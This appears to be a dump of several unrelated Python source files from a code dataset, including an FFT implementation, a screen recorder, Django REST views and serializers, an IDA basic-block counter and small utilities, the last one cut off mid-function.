text stringlengths 8 6.05M |
|---|
class Solution:
    def uniquePaths(self, m: int, n: int) -> int:
        """Number of monotone lattice paths in an m x n grid (LeetCode 62).

        A path takes (m - 1) down-steps and (n - 1) right-steps, so the
        answer is C(m + n - 2, n - 1). The original hand-rolled the
        product/factorial loop; math.comb computes the same value exactly
        and already handles the min(m, n) == 1 edge case (C(k, 0) == 1).
        """
        from math import comb
        return comb(m + n - 2, n - 1)
import matplotlib.pyplot as plt
import numpy as np
from utils import *
import math
import cmath
# W(b)^i = exp(-j*2*pi*(i)/b)
def W(index, basic):
    """Twiddle factor W(basic)^index = exp(-2*pi*j*index/basic)."""
    angle = -2.0 * cmath.pi * index / basic
    return cmath.exp(1j * angle)
# padding f to geExp2
def padding(f):
    """Zero-pad both leading axes of f up to the next power of two.

    geExp2 (from utils) supplies the target size; a trailing channel axis,
    when present, is preserved.
    """
    if f.ndim > 2:
        rows, cols, chans = f.shape
    else:
        rows, cols = f.shape
        chans = 1
    target_rows = geExp2(rows)
    target_cols = geExp2(cols)
    if target_rows != rows:
        shape = (target_rows - rows, cols, chans) if chans > 1 else (target_rows - rows, cols)
        f = np.concatenate((f, np.zeros(shape)))
    if target_cols != cols:
        shape = (target_rows, target_cols - cols, chans) if chans > 1 else (target_rows, target_cols - cols)
        f = np.concatenate((f, np.zeros(shape)), axis=1)
    return f
# 1-D FFT
def fft1d(f):
    """Recursive radix-2 Cooley-Tukey FFT of a 1-D array.

    The length must be a power of two (guaranteed by padding()).
    """
    n = int(f.shape[0])
    if n == 1:
        return f
    even = fft1d(f[0::2])
    odd = fft1d(f[1::2])
    out = np.zeros(f.shape, dtype=complex)
    half = n // 2
    for k in range(half):
        # twiddle factor exp(-2*pi*j*k/n), inlined from W()
        tw = cmath.exp(-1j * 2 * cmath.pi * k / n) * odd[k]
        out[k] = even[k] + tw
        out[k + half] = even[k] - tw
    return out
'''
FFT: Fast Fourier Transform
Input: an image f
Output: transformed F
'''
def FFT(f):
    """2-D FFT of an image: pad to power-of-two sides, then apply the 1-D
    transform to every row and every column (per channel when f is H x W x C).
    """
    f = padding(f)
    if f.ndim > 2:
        rows, cols, chans = f.shape
    else:
        rows, cols = f.shape
        chans = 1
    out = np.zeros(f.shape, dtype=complex)
    for ch in range(chans):
        plane = f if chans == 1 else f[:, :, ch]
        spectrum = np.zeros(plane.shape, dtype=complex)
        # row pass, then column pass: the 2-D DFT is separable
        for r in range(rows):
            spectrum[r, :] = fft1d(plane[r, :])
        for c in range(cols):
            spectrum[:, c] = fft1d(spectrum[:, c])
        if chans == 1:
            out = spectrum
        else:
            out[:, :, ch] = spectrum
    return out
'''
FFTShift: shift (0, 0) to center
'''
def FFTShift(f):
    """Shift the zero-frequency component to the center of the spectrum.

    Replaces the original O(M*N) Python double loops with np.roll: rolling
    by N // 2 along an axis maps index v to (v + N // 2) % N, exactly what
    the manual loops computed (int(v + N / 2) truncates to v + N // 2).
    Output is always complex, matching the original.
    """
    if len(f.shape) > 2:
        M, N, c = f.shape
    else:
        M, N = f.shape
        c = 1
    res = np.zeros(f.shape, dtype=complex)
    for i in range(c):
        fc = f if c == 1 else f[:, :, i]
        # horizontal shift, then vertical shift, as in the original
        rc = np.roll(np.roll(fc.astype(complex), N // 2, axis=1), M // 2, axis=0)
        if c == 1:
            res = rc
        else:
            res[:, :, i] = rc
    return res
'''
iFFT: inverse FFT
Notice: exp(-j) = exp(j).conjugate()
'''
def iFFT(F):
    """Inverse 2-D FFT via the conjugation trick:

        ifft(F) = conj(fft(conj(F))) / (M * N)

    since exp(-j) = exp(j).conjugate(). Assumes F already has
    power-of-two sides (as produced by FFT()).
    """
    if F.ndim > 2:
        rows, cols, chans = F.shape
    else:
        rows, cols = F.shape
        chans = 1
    out = np.zeros(F.shape, dtype=complex)
    for ch in range(chans):
        plane = (F if chans == 1 else F[:, :, ch]).conj()
        spectrum = np.zeros(plane.shape, dtype=complex)
        for r in range(rows):
            spectrum[r, :] = fft1d(plane[r, :])
        for c in range(cols):
            spectrum[:, c] = fft1d(spectrum[:, c])
        if chans == 1:
            out = spectrum
        else:
            out[:, :, ch] = spectrum
    return out.conj() / (rows * cols)
def Show(path, withNP = False):
    """Load the image at path, run the custom FFT pipeline on it, and
    display the results with showImgN; when withNP is True, numpy's FFT
    results are shown alongside for comparison.
    """
    f = plt.imread(path)
    print(f.shape)
    # custom pipeline: forward transform, centered spectrum, inverse
    F = FFT(f)
    FS = FFTShift(F)
    iF = iFFT(FS)
    # log-scale the magnitudes for display; the +1 avoids log(0)
    F = np.log(np.abs(F) + np.ones(F.shape))
    FS = np.log(np.abs(FS) + np.ones(FS.shape))
    iF = np.abs(iF)
    images = [f, F, FS, iF]
    titles = ['original', 'FFT', 'FFT Shift', 'inverse FFT']
    if withNP:
        F1 = np.fft.fft2(f)
        FS1 = np.fft.fftshift(F1)
        iF1 = np.fft.ifft2(FS1)
        F1 = np.log(np.abs(F1) + np.ones(F1.shape))
        FS1 = np.log(np.abs(FS1) + np.ones(FS1.shape))
        iF1 = np.abs(iF1)
        images += [F1, FS1, iF1]
        titles += ['FFT np', 'FFT Shift np', 'inverse FFT np']
    showImgN(images, titles)
def main():
    """Demo entry point: run the FFT pipeline on a sample image and
    compare against numpy's implementation."""
    Show('../img/1.tif', True)


if __name__ == '__main__':
    main()
import cv2
import numpy as np
import pyautogui as p
# Record the screen to a video file until 'q' is pressed in the preview window.
rs = p.size()
fn = input("Enter the location where you want to store file:")
fps = 10.0
fourcc = cv2.VideoWriter_fourcc(*'XVID')
output = cv2.VideoWriter(fn, fourcc, fps, rs)
cv2.namedWindow("Live_Rec", cv2.WINDOW_NORMAL)
cv2.resizeWindow("Live_Rec", (600, 400))
try:
    while True:
        img = p.screenshot()
        f = np.array(img)
        # swap R and B channels so cv2 (BGR) writes correct colors
        f = cv2.cvtColor(f, cv2.COLOR_BGR2RGB)
        output.write(f)
        cv2.imshow("Live_Rec", f)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
finally:
    # BUG FIX: always release the writer and destroy the windows, even on
    # an exception or Ctrl-C — otherwise the video file can end up corrupt.
    output.release()
    cv2.destroyAllWindows()
|
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
"""Fix up surfer.Brain"""
from surfer import Brain as SurferBrain
from ._brain_mixin import BrainMixin
class Brain(BrainMixin, SurferBrain):
    """surfer.Brain subclass augmented with BrainMixin behavior.

    Parameters
    ----------
    unit
        Passed to BrainMixin; presumably the unit of the displayed data —
        confirm against BrainMixin's docstring.
    *args, **kwargs
        Forwarded unchanged to surfer.Brain.
    """
    def __init__(self, unit, *args, **kwargs):
        # Initialize the mixin first so its state exists before the
        # PySurfer constructor runs; both bases are called explicitly
        # rather than via super() to keep this exact order.
        BrainMixin.__init__(self, unit)
        SurferBrain.__init__(self, *args, **kwargs)
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.http import JsonResponse
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import *
from .serializers import *
from rest_framework import status
from rest_framework import generics
from django.contrib.auth.models import User
from rest_framework import permissions
from django.http import Http404
from django.contrib.auth.models import User
from .serializers import UserSerializer
class Klient_list(APIView):
    """List all Klient records or create a new one."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get(self, request, format=None):
        """Return every Klient, serialized."""
        klienci = Klient.objects.all()
        serializer = KlientS(klienci, many=True)
        return Response(serializer.data)

    def post(self, request, format=None):
        """Create a Klient from the request payload."""
        serializer = KlientS(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status.HTTP_201_CREATED)
        # BUG FIX: return the validation errors (the original returned
        # serializer.data, hiding why the request failed; the detail views
        # in this module already return serializer.errors).
        return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
class Klient_list_detail(APIView):
    """Retrieve, update or delete a single Klient."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get_object(self, pk):
        """Fetch the Klient with the given primary key or raise 404."""
        try:
            return Klient.objects.get(pk=pk)
        except Klient.DoesNotExist:
            raise Http404

    def get(self, request, pk, format=None):
        # BUG FIX: 'pk' was referenced but missing from the signature,
        # so every call raised NameError (delete() already had it).
        klient = self.get_object(pk)
        serializer = KlientS(klient)
        return Response(serializer.data)

    def post(self, request, pk, format=None):
        # BUG FIX: same missing-'pk' problem as get().
        klient = self.get_object(pk)
        serializer = KlientS(klient, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def delete(self, request, pk, format=None):
        """Delete the Klient and return 204."""
        klient = self.get_object(pk)
        klient.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
class Dane_F(APIView):
    """List all Dane_firmy (company-data) records or create a new one."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get(self, request, format=None):
        """Return every Dane_firmy record, serialized."""
        firmy = Dane_firmy.objects.all()
        serializer = Dane_firmyS(firmy, many=True)
        return Response(serializer.data)

    def post(self, request, format=None):
        """Create a Dane_firmy record from the request payload."""
        serializer = Dane_firmyS(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status.HTTP_201_CREATED)
        # BUG FIX: report validation errors, not serializer.data.
        return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
class Dane_F_detail(APIView):
    """Retrieve, update or delete a single Dane_firmy record."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get_object(self, pk):
        """Fetch the Dane_firmy with the given primary key or raise 404."""
        try:
            return Dane_firmy.objects.get(pk=pk)
        except Dane_firmy.DoesNotExist:
            raise Http404

    def get(self, request, pk, format=None):
        # BUG FIX: 'pk' was missing from the signature (NameError).
        firma = self.get_object(pk)
        serializer = Dane_firmyS(firma)
        return Response(serializer.data)

    def post(self, request, pk, format=None):
        # BUG FIX: same missing-'pk' problem as get().
        firma = self.get_object(pk)
        serializer = Dane_firmyS(firma, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def delete(self, request, pk, format=None):
        """Delete the record and return 204."""
        firma = self.get_object(pk)
        firma.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
class Pracownicy(APIView):
    """List all Personel (staff) records or create a new one."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get(self, request, format=None):
        """Return every Personel record, serialized."""
        osoby = Personel.objects.all()
        serializer = PersonelS(osoby, many=True)
        return Response(serializer.data)

    def post(self, request, format=None):
        """Create a Personel record from the request payload."""
        serializer = PersonelS(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status.HTTP_201_CREATED)
        # BUG FIX: report validation errors, not serializer.data.
        return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
class Pracownicy_detail(APIView):
    """Retrieve, update or delete a single Personel record."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get_object(self, pk):
        """Fetch the Personel with the given primary key or raise 404."""
        try:
            return Personel.objects.get(pk=pk)
        except Personel.DoesNotExist:
            raise Http404

    def get(self, request, pk, format=None):
        # BUG FIX: 'pk' was missing from the signature (NameError).
        osoba = self.get_object(pk)
        serializer = PersonelS(osoba)
        return Response(serializer.data)

    def post(self, request, pk, format=None):
        # BUG FIX: same missing-'pk' problem as get().
        osoba = self.get_object(pk)
        serializer = PersonelS(osoba, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def delete(self, request, pk, format=None):
        """Delete the record and return 204."""
        osoba = self.get_object(pk)
        osoba.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
class Zlecenia_p(APIView):
    """List all Zlecenia (orders) or create a new one."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get(self, request, format=None):
        """Return every Zlecenia record, serialized."""
        zlecenia = Zlecenia.objects.all()
        serializer = ZleceniaS(zlecenia, many=True)
        return Response(serializer.data)

    def post(self, request, format=None):
        """Create a Zlecenia record from the request payload."""
        serializer = ZleceniaS(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status.HTTP_201_CREATED)
        # BUG FIX: report validation errors, not serializer.data.
        return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
class Zlecenia_p_detail(APIView):
    """Retrieve, update or delete a single Zlecenia record."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get_object(self, pk):
        """Fetch the Zlecenia with the given primary key or raise 404."""
        try:
            return Zlecenia.objects.get(pk=pk)
        except Zlecenia.DoesNotExist:
            raise Http404

    def get(self, request, pk, format=None):
        # BUG FIX: 'pk' was missing from the signature (NameError), and the
        # original serialized a Zlecenia object with PersonelS — a copy-paste
        # mistake; ZleceniaS is the serializer used everywhere else here.
        zlecenie = self.get_object(pk)
        serializer = ZleceniaS(zlecenie)
        return Response(serializer.data)

    def post(self, request, pk, format=None):
        # BUG FIX: same missing-'pk' problem as get().
        zlecenie = self.get_object(pk)
        serializer = ZleceniaS(zlecenie, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def delete(self, request, pk, format=None):
        """Delete the record and return 204."""
        zlecenie = self.get_object(pk)
        zlecenie.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
class Obecnosci(APIView):
    """List all Obecnosc (attendance) records or create a new one."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get(self, request, format=None):
        """Return every Obecnosc record, serialized."""
        obecnosci = Obecnosc.objects.all()
        serializer = ObecnoscS(obecnosci, many=True)
        return Response(serializer.data)

    def post(self, request, format=None):
        """Create an Obecnosc record from the request payload."""
        serializer = ObecnoscS(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status.HTTP_201_CREATED)
        # BUG FIX: report validation errors, not serializer.data.
        return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
class Obecnosci_detail(APIView):
    """Retrieve, update or delete a single Obecnosc record."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get_object(self, pk):
        """Fetch the Obecnosc with the given primary key or raise 404."""
        try:
            return Obecnosc.objects.get(pk=pk)
        except Obecnosc.DoesNotExist:
            raise Http404

    def get(self, request, pk, format=None):
        # BUG FIX: 'pk' was missing from the signature (NameError).
        obecnosc = self.get_object(pk)
        serializer = ObecnoscS(obecnosc)
        return Response(serializer.data)

    def post(self, request, pk, format=None):
        # BUG FIX: same missing-'pk' problem as get().
        obecnosc = self.get_object(pk)
        serializer = ObecnoscS(obecnosc, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def delete(self, request, pk, format=None):
        """Delete the record and return 204."""
        obecnosc = self.get_object(pk)
        obecnosc.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
class UserList(generics.ListAPIView):
    """Read-only list of all Django auth users."""
    queryset = User.objects.all()
    serializer_class = UserSerializer
class UserDetail(generics.RetrieveAPIView):
    """Read-only detail view for a single Django auth user."""
    queryset = User.objects.all()
    serializer_class = UserSerializer
|
from repository_analyzers.offline.i_repository_analyzer import IRepositoryAnalyzer
from abc import ABCMeta, abstractmethod
import os
class AbstractRepositoryAnalyzer(IRepositoryAnalyzer, metaclass=ABCMeta):
    """
    Abstract base class for repository-analysis plug-ins.

    BUG FIX: the original set the Python-2-only '__metaclass__ = ABCMeta'
    attribute, which has no effect on Python 3, so @abstractmethod was not
    enforced; the metaclass is now passed in the class header.
    """

    def __init__(self, package_analyzers, file_analyzers):
        """
        Constructor for all classes that continue to implement this class.
        :param package_analyzers: Analyzers run against package files.
        :param file_analyzers: Analyzers run against every file.
        """
        self._repo_details = dict()
        self.package_analyzers = package_analyzers
        self.file_analyzers = file_analyzers

    @abstractmethod
    def _analyze(self, path, repo_details) -> iter:
        """
        Analyzes all repositories based on their repository type, and yield
        returns (repo_path, origin URL) pairs.
        :param path: Path to the repositories.
        :param repo_details: Details to the repository.
        :return: Iterable of (repo_path, remote) pairs.
        """
        raise NotImplementedError

    def get_details(self, remote: str) -> dict:
        """
        Gets the details of a repository based on its remote URL, creating
        the entry on first access.
        :param remote: Remote URL.
        :return: Mutable details dict for that remote.
            (BUG FIX: annotated -> dict; the original said -> None yet
            returned the dict.)
        """
        if remote not in self._repo_details:
            self._repo_details[remote] = dict()
            self._repo_details[remote]["url"] = remote
        return self._repo_details[remote]

    def initialize_details(self, remote: str) -> None:
        """
        Initializes fields for file analyzers.
        :param remote: Remote URL.
        :return: None
        """
        for file_analyzer in self.file_analyzers:
            file_analyzer.initialize_fields(self.get_details(remote))

    def __process_files(self, directory: str, remote: str) -> None:
        """
        Analyzes all files inside a directory.
        :param directory: Repository root directory.
        :param remote: Remote URL.
        :return: None.
        """
        self.initialize_details(remote)
        # Build the full recursive file list once, then hand it to each analyzer.
        filelist = [os.path.join(path, name)
                    for path, _subdirs, files in os.walk(directory)
                    for name in files]
        for file_analyzer in self.file_analyzers:  # fixed 'file_anlayzer' typo
            file_analyzer.analyze_files(filelist, self.get_details(remote))

    def analyze_repositories(self, path: str, repo_details: dict) -> None:
        """Run package and file analysis over every repository yielded by _analyze."""
        for repo_path, remote in self._analyze(path, repo_details):
            self.__analyze_packages(repo_path, remote)
            self.__process_files(repo_path, remote)

    def __analyze_packages(self, path: str, remote: str) -> None:
        """
        Analyze package-files of a repository.
        :param path: Path to root containing files to analyze.
        :param remote: Remote URL of the repository containing the file.
        :return: None
        """
        for package_analyzer in self.package_analyzers:
            details = self.get_details(remote)
            if "packages" not in details:
                details["packages"] = list()
            details["packages"].extend(package_analyzer.analyze(path))
|
# -*- coding: utf-8 -*-
"""
used for calculate the number of basicblocks of a binary file
the result will be written in ./data.txt
"""
import os

import idaapi
import idc
def getBasicblocksByAddr(tgtEA):
    """Return the number of basic blocks in the function containing tgtEA.

    Returns 0 when tgtEA is None or no function exists at that address.
    """
    if tgtEA is None:
        # BUG FIX: the original had a bare 'exit' statement here, which only
        # references the builtin and does nothing; return instead.
        return 0
    f = idaapi.get_func(tgtEA)
    if not f:
        print("No function at 0x%x" % tgtEA)
        # BUG FIX: same no-op 'exit'; without returning, execution fell
        # through to idaapi.FlowChart(None).
        return 0
    fc = idaapi.FlowChart(f)
    numBlocks = 0
    for _block in fc:
        numBlocks += 1
    return numBlocks
def main():
    """Count basic blocks over all functions in the IDB and append the
    total to ./data.txt next to this script."""
    totalBlocks = 0
    for f in Functions():
        # name/end/frame-size lookups in the original were unused; only the
        # block count feeds the total
        totalBlocks += getBasicblocksByAddr(f)
    Message("Total: %d blocks\n" % totalBlocks)
    # BUG FIX: 'os' was used here but never imported at module level
    # (added to the imports at the top of the file).
    log_file_uri = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data.txt')
    # 'with' guarantees the log file is closed even if write() fails
    with open(log_file_uri, 'a') as log_file:
        log_file.write('Total basicblocks: ' + str(totalBlocks) + '\n')
    idc.Exit(0)  # Exit IDA Pro


if __name__ == '__main__':
    main()
import pygame.font
import pygame
class Button():
    """Text button rendered with a fixed font and centered on the screen."""

    def __init__(self, game_settings, screen, msg, color = (0, 0, 0, 0),
                 text_color = (255, 255, 255)):
        """Render msg immediately and center the resulting rect."""
        self.screen = screen
        self.game_settings = game_settings
        self.msg = str(msg)
        self.width, self.height = 1, 1
        self.color = color
        self.text_color = text_color
        # Boxy-Bold at 150pt; prep_msg() fills in msg_image and rect.
        self.font = pygame.font.Font('font/Boxy-Bold.ttf', 150)
        self.prep_msg()
        self.rect.center = self.screen.get_rect().center

    def prep_msg(self):
        """Render the message once and cache its image and bounding rect."""
        rendered = self.font.render(self.msg, True, self.text_color, self.color)
        self.msg_image = rendered
        self.rect = rendered.get_rect()

    def draw_button(self):
        """Paint the background rect, then blit the rendered message onto it."""
        self.screen.fill(self.color, self.rect)
        self.screen.blit(self.msg_image, self.rect)
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
def interval_in_day(time, interval):
    """Return the zero-based slot index of `time` within its day, where the
    day is divided into `interval`-minute slots.

    `time` is a YYYYMMDDHHMMSS timestamp (int or str).
    """
    moment = datetime.datetime.strptime(str(time), "%Y%m%d%H%M%S")
    midnight = moment.replace(hour=0, minute=0, second=0)
    elapsed = (moment - midnight).total_seconds()
    return int(elapsed / (interval * 60))
|
# Read an integer and report its successor and predecessor.
number = int(input("Please enter an integer number:"))
print("The next number for the number ", number, "is", (number + 1),
      "\nThe previous number for the number ", number, "is", (number - 1))
|
from datetime import datetime
from django.urls import reverse
from rest_framework import serializers
from .view_helpers import description_from_notes
class ExternalIdentifierSerializer(serializers.Serializer):
    """Identifier assigned to a record by an external system."""
    identifier = serializers.CharField()
    source = serializers.CharField()
class DateSerializer(serializers.Serializer):
    """Structured date with a display expression and begin/end bounds."""
    expression = serializers.CharField()
    begin = serializers.DateField()
    # NOTE(review): 'end' is a CharField while 'begin' is a DateField, and
    # 'label' is a DateField — confirm these field types are intentional.
    end = serializers.CharField(allow_null=True)
    label = serializers.DateField()
    type = serializers.CharField()
class ExtentSerializer(serializers.Serializer):
    """Typed numeric extent (e.g. a quantity of some unit)."""
    value = serializers.FloatField()
    type = serializers.CharField()
class LanguageSerializer(serializers.Serializer):
    """Language with a human-readable expression and an identifier code."""
    expression = serializers.CharField()
    identifier = serializers.CharField()
class SubnoteSerializer(serializers.Serializer):
    """Typed sub-element of a note."""
    type = serializers.CharField()
    content = serializers.SerializerMethodField()

    def get_content(self, obj):
        """Coerce content into a list so it can be serialized as JSON."""
        return list(obj.content)
class NoteSerializer(serializers.Serializer):
    """Note composed of typed subnotes."""
    type = serializers.CharField()
    title = serializers.CharField()
    source = serializers.CharField()
    subnotes = SubnoteSerializer(many=True)
class RightsGrantedSerializer(serializers.Serializer):
    """A right granted (or restricted) for a bounded date range."""
    act = serializers.CharField()
    begin = serializers.DateField()
    end = serializers.DateField()
    restriction = serializers.CharField()
    notes = NoteSerializer(many=True, allow_null=True)
class RightsStatementSerializer(serializers.Serializer):
    """Rights statement covering a record, with its granted acts."""
    determination_date = serializers.DateField()
    type = serializers.CharField()
    rights_type = serializers.CharField()
    begin = serializers.DateField()
    end = serializers.DateField()
    copyright_status = serializers.CharField(allow_null=True)
    other_basis = serializers.CharField(allow_null=True)
    jurisdiction = serializers.CharField(allow_null=True)
    notes = NoteSerializer(many=True, allow_null=True)
    rights_granted = RightsGrantedSerializer(many=True)
class GroupSerializer(serializers.Serializer):
    """Minimal identifier/title pair for a record group."""
    identifier = serializers.CharField()
    title = serializers.CharField()
class ReferenceSerializer(serializers.Serializer):
    """Lightweight pointer to another record, with a resolvable detail URI."""
    title = serializers.CharField()
    type = serializers.CharField(allow_null=True)
    online = serializers.SerializerMethodField()
    hit_count = serializers.IntegerField(allow_null=True)
    online_hit_count = serializers.IntegerField(allow_null=True)
    uri = serializers.SerializerMethodField()
    dates = serializers.CharField(allow_null=True)
    description = serializers.CharField(allow_null=True)
    group = GroupSerializer(allow_null=True)
    index = serializers.IntegerField(source="position", allow_null=True)

    def get_online(self, obj):
        """True when the referenced record is marked available online."""
        return getattr(obj, "online", False)

    def get_uri(self, obj):
        """Return obj.uri (minus trailing slash) or reverse a detail route.

        Agent-like and term-like types share the 'agent'/'term' routes.
        """
        explicit = getattr(obj, "uri", None)
        if explicit:
            return explicit.rstrip('/')
        agent_kinds = ("person", "organization", "family", "software")
        term_kinds = ("cultural_context", "function", "geographic",
                      "genre_form", "occupation", "style_period", "technique",
                      "temporal", "topical")
        basename = obj.type
        if basename in agent_kinds:
            basename = "agent"
        elif basename in term_kinds:
            basename = "term"
        return reverse('{}-detail'.format(basename), kwargs={"pk": obj.identifier})
class BaseListSerializer(serializers.Serializer):
    """Shared fields for list views; resolves each hit's detail URI."""
    uri = serializers.SerializerMethodField()
    type = serializers.CharField()
    title = serializers.CharField()
    dates = DateSerializer(many=True, allow_null=True)

    def get_uri(self, obj):
        # Prefer the view's registered basename; fall back to the object type.
        basename = self.context.get('view').basename or obj.type
        return reverse('{}-detail'.format(basename), kwargs={"pk": obj.meta.id})
class BaseDetailSerializer(serializers.Serializer):
    """Shared fields for detail views; resolves the record's own URI."""
    uri = serializers.SerializerMethodField()
    title = serializers.CharField()
    type = serializers.CharField()
    category = serializers.CharField(allow_null=True)
    offset = serializers.IntegerField(allow_null=True)
    group = GroupSerializer()
    external_identifiers = ExternalIdentifierSerializer(many=True)

    def get_uri(self, obj):
        # Prefer the view's registered basename; fall back to the object type.
        basename = self.context.get('view').basename or obj.type
        return reverse('{}-detail'.format(basename), kwargs={"pk": obj.meta.id})
class AgentSerializer(BaseDetailSerializer):
    """Detail representation of an agent (person, organization, etc.)."""
    agent_type = serializers.CharField()
    authorized_name = serializers.CharField()
    description = serializers.CharField(allow_null=True)
    dates = DateSerializer(many=True, allow_null=True)
    notes = NoteSerializer(many=True, allow_null=True)
class AgentListSerializer(BaseListSerializer):
    """List representation of agents; inherits all base list fields."""
    pass
class CollectionSerializer(BaseDetailSerializer):
    """Detail representation of a collection."""
    level = serializers.CharField()
    parent = serializers.CharField(allow_null=True)
    languages = LanguageSerializer(many=True, allow_null=True)
    description = serializers.SerializerMethodField()
    extents = ExtentSerializer(many=True)
    formats = serializers.ListField()
    online = serializers.BooleanField()
    dates = DateSerializer(many=True, allow_null=True)
    notes = NoteSerializer(many=True, allow_null=True)
    rights_statements = RightsStatementSerializer(many=True, allow_null=True)
    agents = ReferenceSerializer(many=True, allow_null=True)
    creators = ReferenceSerializer(many=True, allow_null=True)
    terms = ReferenceSerializer(many=True, allow_null=True)

    def get_content(self, obj):
        pass

    def get_description(self, obj):
        # Derive a display description from the record's notes.
        return description_from_notes(getattr(obj, "notes", []))
class CollectionListSerializer(BaseListSerializer):
    """List representation of collections; inherits all base list fields."""
    pass
class ObjectSerializer(BaseDetailSerializer):
    """Detail representation of an archival object."""
    languages = LanguageSerializer(many=True, allow_null=True)
    parent = serializers.CharField(allow_null=True)
    description = serializers.SerializerMethodField()
    extents = ExtentSerializer(many=True, allow_null=True)
    formats = serializers.ListField()
    online = serializers.BooleanField()
    dates = DateSerializer(many=True, allow_null=True)
    notes = NoteSerializer(many=True, allow_null=True)
    rights_statements = RightsStatementSerializer(many=True, allow_null=True)
    agents = ReferenceSerializer(many=True, allow_null=True)
    terms = ReferenceSerializer(many=True, allow_null=True)

    def get_description(self, obj):
        # Derive a display description from the record's notes.
        return description_from_notes(getattr(obj, "notes", []))
class ObjectListSerializer(BaseListSerializer):
    """List representation of objects; inherits all base list fields."""
    pass
class TermSerializer(BaseDetailSerializer):
    """Detail representation of a term, with its linked records."""
    term_type = serializers.CharField()
    collections = ReferenceSerializer(many=True, allow_null=True)
    objects = ReferenceSerializer(many=True, allow_null=True)
class TermListSerializer(BaseListSerializer):
    """List representation of terms; inherits all base list fields."""
    pass
class CollectionHitSerializer(serializers.Serializer):
    """Serializes data for collapsed hits."""
    category = serializers.CharField(source="group.category")
    dates = serializers.SerializerMethodField()
    hit_count = serializers.IntegerField()
    online_hit_count = serializers.IntegerField(allow_null=True)
    title = serializers.CharField(source="group.title")
    uri = serializers.SerializerMethodField()
    creators = serializers.SerializerMethodField()

    def get_dates(self, obj):
        """Dates of the collapsed group, as plain dicts."""
        return [entry.to_dict() for entry in obj.group.dates]

    def get_creators(self, obj):
        """Creator titles, or an empty list when the group has none."""
        creators = getattr(obj.group, "creators", None)
        return [creator.title for creator in creators] if creators else []

    def get_uri(self, obj):
        """Group identifier without a trailing slash."""
        return obj.group.identifier.rstrip("/")
class FacetSerializer(serializers.Serializer):
    """Serializes facets."""

    def to_representation(self, instance):
        # Flattens instance.aggregations (presumably an Elasticsearch-style
        # aggregations payload — confirm against the search backend) into a
        # {facet_name: buckets-or-value} dict.
        resp = {}
        for k, v in instance.aggregations.to_dict().items():
            if "buckets" in v:
                resp[k] = v["buckets"]
            elif "name" in v:  # move nested aggregations up one level
                resp[k] = v["name"]["buckets"]
            elif k in ["max_date", "min_date"]:  # convert timestamps to year
                # value arrives in milliseconds; guard against null values
                value = (datetime.fromtimestamp(v["value"] / 1000.0).year) if v["value"] else None
                resp[k] = {"value": value}
            else:
                # pass any unrecognized aggregation through untouched
                resp[k] = v
        return resp
class AncestorsSerializer(serializers.Serializer):
    """Provides a nested dictionary representation of ancestors."""

    def serialize_ancestors(self, ancestor_list, tree, idx):
        """Recursively wrap each ancestor's serialized data around the
        accumulated tree, nesting deeper entries under a 'child' key."""
        merged = {**ReferenceSerializer(ancestor_list[idx]).data, **tree}
        if idx == len(ancestor_list) - 1:
            return merged
        return self.serialize_ancestors(ancestor_list, {"child": merged}, idx + 1)

    def to_representation(self, instance):
        # An empty/missing ancestor list serializes to an empty dict.
        return self.serialize_ancestors(instance, {}, 0) if instance else {}
|
from django.urls import path
# from rest_framework.authtoken.views import obtain_auth_token
from rest_framework_jwt.views import obtain_jwt_token,refresh_jwt_token,verify_jwt_token
# JWT auth endpoints: obtain, refresh, and verify a token.
urlpatterns = [
    # path ('api-token-auth/',obtain_auth_token),
    path('api-jwt-auth/', obtain_jwt_token),
    path('api-jwt-auth/refresh/', refresh_jwt_token),
    # BUG FIX: added the missing trailing slash for consistency with the
    # sibling routes (Django's APPEND_SLASH redirect does not help POSTs).
    path('api-jwt-auth/verify/', verify_jwt_token),
]
|
def test(a):
times_list = []
times_list_str = []
n = int(a[0])
for i in range(1, n+1):
# print(a[i])
times_list_str.append(str(a[i]))
print(times_list_str[i-1])
times_list.append(int(str(a[i]).replace(':', '')))
